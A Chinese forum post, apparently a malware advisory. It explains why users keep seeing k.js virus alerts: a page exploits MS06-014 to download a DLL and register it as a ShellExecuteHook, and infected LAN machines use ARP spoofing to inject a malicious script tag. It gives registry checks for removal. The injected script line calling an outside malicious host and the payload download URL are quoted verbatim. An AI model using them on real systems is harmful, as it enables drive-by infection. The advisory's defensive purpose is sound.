本来想午睡的,看来这个情况是睡不了了。
该网页利用MS06-014漏洞,下载http://day.91tg.net/xp.dll到C:\WINDOWS\winhelp.dll,并直接写入注册表
HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}\
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}
指向C:\WINDOWS\winhelp.dll
由于瑞星查杀了k.js,一般情况下大家是不会中毒的。但是之所以重复出现k.js的报毒,原因是:
局域网中有电脑中了此毒,然后向局域网中其他电脑发动ARP攻击,将其他用户接收到的网络数据包中加入
<script src="http://k.sb941.com/k.js" type="text/javascript"></script>
的代码,导致其他用户访问任何网站时都会报毒。
所以,首先,确认你的电脑是否中毒:
确认以下注册表路径是否存在:
[HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
如果存在,尝试在安全模式下删除这两个注册表路径。
如果不存在,说明不是你本机的中毒问题,而是你受到ARP攻击的缘故。
这种情况下,请联系局域网网管进行协调处理。必须找到中毒并进行ARP欺骗的电脑,然后将其断网查毒。
对于客户端上网流程和“网页挂马”的几种方式分析可参考
http://hi.baidu.com/litiejun/blog/item/049d703d4f64ffef3c6d9738.html其中所提到的:
攻击点:1.在客户端(网民)主机或网络中发送攻击代码,比如ARP攻击,插入恶意代码,诱使用户访问攻击者指定的站点,这时会影响该客户端或其所在的网络
正是本帖用户所面临的情况。
